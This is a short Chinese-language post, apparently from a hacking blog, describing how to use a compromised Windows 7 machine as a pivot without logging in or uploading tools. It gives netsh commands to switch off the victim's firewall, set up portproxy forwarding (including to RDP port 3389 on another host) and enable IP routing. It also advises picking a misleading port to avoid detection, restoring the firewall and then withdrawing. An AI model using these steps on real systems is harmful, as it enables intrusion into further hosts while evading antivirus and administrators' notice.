WIN7自带端口转发渗透小技巧
目标是WIN7 X64,且开启了防火墙,想要用他的机器去访问别的机器,又不想登陆他的系统,常规办法一般是上传一个htran,然后进行转发,但是对方有杀软,有被杀的可能性,所以我用另外一种办法达到我的目的。
为了方便,先关闭他的防火墙
netsh advfirewall set allprofiles state off
(win2003&xp是用netsh firewall set opmode DISABLE 关闭)
你也可以放行listenport,具体命令自行查资料。然后用netsh interface portproxy 进行转发到目标服务器,但是有个小缺陷,端口是能在系统里看到的,毕竟是R3层的东西,不像Linux 的IPTABLES,所以必须选择一个迷惑性的端口。
操作完毕后,恢復防火墙netsh advfirewall set allprofiles state on.然后撤退。
关於netsh 转发,请参考以下内容:Windows下端口转发。
添加:
netsh interface portproxy add v4tov4 listenport=轉發端口 listenaddress=本機IP connectport=目標端口 connectaddress=目標IP
例子:
netsh interface portproxy add v4tov4 8002 202.112.58.200 8002 //本地ALL IP轉目標IP8002
netsh interface portproxy add v4tov4 listenport=5200 listenaddress=1.1.1.1 connectport=3389 connectaddress=2.2.2.2 //指定IP轉發。
XP/2003需要先安裝IPV6
netsh interface ipv6 install
刪除:
netsh interface portproxy delete v4tov4 listenport=轉發端口 listenaddress=本機IP
配置IP路由轉發:
netsh interface ipv4 set int 26 forwarding=enabled
26是網絡接口編號,可以用netsh interface ipv4 show interfaces來查看.
1
0